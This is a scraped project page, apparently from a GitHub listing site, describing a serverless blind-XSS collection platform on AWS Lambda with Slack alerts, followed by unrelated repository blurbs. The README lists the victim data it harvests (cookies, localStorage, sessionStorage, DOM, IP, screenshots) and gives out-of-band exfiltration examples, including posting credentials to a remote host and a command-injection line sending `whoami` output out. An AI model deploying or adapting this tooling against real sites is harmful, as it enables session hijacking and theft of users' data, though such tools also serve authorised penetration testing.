The AWS Lambda Serverless Blind XSS App

Related tags

Third-party APIs Wrappersass
Overview

Ass

The AWS Lambda Serverless Blind XSS App

利用VPS配置XSS平台太麻烦了,如果利用AWS的Lambda那不就是一个域名的事情么?剩下的环境配置、HTTPS证书、隐私性、VPS续费都不用管了, 所以根据xless重写了Lambda平台的XSS,利用slack机器人通知的方式代替邮件或者短信

XSS有四个URL可用,部署的时候建议修改不同的地址:

⚠️ 准备工作

  • AWS账号
  • Slack账号,包括一个slack App的通知机器人和上传图片需要的Auth Token
  • 自定义域名(可选)

🚀 部署

Slack

创建Slack的App,创建之后点进APP获取webhook和Token, webhook使用来通知机器人,Token可以使用xoxb开头的OAuth token,用于上传图片:

slack.png

AWS Lambda

部署Lambda

修改app.pyToken,Bot为你自己的信息:

virtualenv venv -p python3
. venv/bin/activate
sls plugin install -n serverless-wsgi
sls plugin install -n serverless-python-requirements
sls deploy #部署到aws
sls wsgi serve #本地测试
绑定自定义域名

首先在域名提供商更改ns的地址,使用Route 53服务管理域名,设置自定义域名步骤:how-to-edge-optimized-custom-domain-name,总结来说如下:

  1. 在API Gateway增加自定义域名,选择 Edge-optimized,在API映射选择创建好的lambda函数
  2. 为域名配置ACM证书
  3. 配置好之后得到一个*.cloudfront.net格式的域名
  4. 在Route 53设置cname别名,cloudflare家不支持

📨 收集的信息

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address
  • Screenshot

xss.png

📡 Out-of-Band (OOB)

OOB场景1

在网站插入JS获取敏感信息传输到远程服务器,注意使用JSON格式:

http https://example.com/msg "UserName=admin" "Password=admin"  -v

oob

OOB场景2

命令执行外带到远程http服务:

http https://example.com/404/`whoami`

oob

TODO

  • 每次需要改JS的时候需要重新部署Lambda
Owner
cocokey
cocokey
GitHub Repository
CSUL Discord Bot

Cruzeiro This is the same old bot running on the Discord Server of CSUL, but i've changed the code. It's better now. Discord.py Heroku How i did The b

Operaho 6 Jan 31, 2022
This repository will (hopefully) always contain the latest version of the libProfessorP.asm.so shared object.

libPuhfessorP - Deploy Repo This repo should (hopefully) always contain the latest version of the libPuhfessorP.asm.so shared object, to be linked wit

Puhfessor P - CPSC 240 3 Sep 30, 2021
Simple base for a telethon bot!

Telethon Bot Simple base used to make a Telegram Bot in telethon. Join @BotzHub! Note: The client, here, is named BotzHub. Fork and add your plugins t

Aditya 54 Oct 21, 2022
OpenEmu Discord Rich Presence provided with Python!

A simple application that provides your current OpenEmu game as an RPC state in Discord via PyPresence. How to use Unzip and open the latest x86_64 ve

Deltaion Lee 6 May 30, 2022
Advance Anonymous Sender bot with Caption Editor

AnonyMous Sender 👨‍💻 Advanced Anonymous Sender with Caption Editor Join @DaisySupport_Official 🎵 for help Features Get forwarded messages without f

Inuka Asith 13 Oct 09, 2022
Automatically pick a winner who Retweeted, Commented, and Followed your Twitter account!

AutomaticTwitterGiveaways automates selecting winners for "Retweet, Comment, Follow" type Twitter giveaways.

1 Jan 13, 2022
Framework to collect and process weather data from wttr.in.

Weathercrawler Automatic extraction and processing framework for weather data from wttr.in Installation tested with: Python 3.7.3 Python 3.9.4 git clo

Maurice Günder 0 Jul 26, 2021
Send embeds using your discord personal account

Welcome to Embed Sender 👋 Send embeds using your discord personal account Install pip install -r requirements.txt Usage Put your discord token in ./

SkydenFly 11 Sep 07, 2022
Практическая работа 6 - Документирование кода

Практическая работа №6 ПСП – правильная скобочная последовательность – последовательность из открывающих «(« и закрывающих «)» круглых скобок. Програм

0 Apr 14, 2022
A modern,feature-rich, and async ready API wrapper for Discord written in Python

discord.io A modern, easy to use, feature-rich, and async ready API wrapper for Discord written in Python. Key Features Modern Pythonic API using asyn

Vincent 18 Jan 02, 2023
Template to create a telegram bot in python

Template for Telegram Bot Template to create a telegram bot in python. How to Run Set your telegram bot token as environment variable TELEGRAM_BOT_TOK

PyTopia 10 Mar 07, 2022
Astro Bot With Golang

Astro-Bot Features: Astronomy Picture of the day Horoscope People In Space How we built it Our team was broken, one person didn't do anything the othe

Vaarun Sinha 1 Nov 21, 2021
Python module and command line script client for http://urbandictionary.com

py-urbandict py-urbandict is a client for urbandictionary.com. Project page on github: https://github.com/novel/py-urbandict PyPI: https://pypi.org/pr

Roman Bogorodskiy 32 Oct 01, 2022
Asynchronous Python Wrapper for the Ufile API

Ufile.io Asynchronous Python Wrapper for the Ufile API (Unofficial).

Gautam Kumar 16 Aug 31, 2022
Python Dialogflow CX Scripting API (SCRAPI)

Python Dialogflow CX Scripting API (SCRAPI) A high level scripting API for bot builders, developers, and maintainers. Table of Contents Introduction W

Google Cloud Platform 39 Dec 09, 2022
Status-embed - Cool open source profile embed for Discord

Current Status : Incomplete Status Embed Status Embed is an awesome open source

Ritabrata Das 2 Feb 17, 2022
A Discord/Xenforo bot!

telathbot A Discord/Xenforo bot! Pre-requisites pyenv (via installer) poetry Docker (with Go version of docker compose enabled) Local development Crea

Telath 4 Mar 09, 2022
GitGram Bot. Bot Then Message You Your Repo Starts, Forks, And Many More

Yet Another GitAlertBot Inspired From Dev-v2's GitGram Run Bot: Local Host Git Clone Repo : For Telethon Version : git clone https://github.com/TeamAl

Alina RoBot 2 Nov 24, 2021
POC de uma AWS lambda que executa a consulta de preços de criptomoedas, e é implantada na AWS usando Github actions.

Cryptocurrency Prices Overview Instalação Repositório Configuração CI/CD Roadmap Testes Overview A ideia deste projeto é aplicar o conteúdo estudado s

Gustavo Santos 3 Aug 31, 2022
A Python app which retrieves the rank and players' equipped skins during a match

VALORANT rank yoinker About The Project Usage Contributing Contact Acknowledgements Disclaimer About The Project Their Queue Current Skin Current Rank

Isaac Kenyon 270 Jan 04, 2023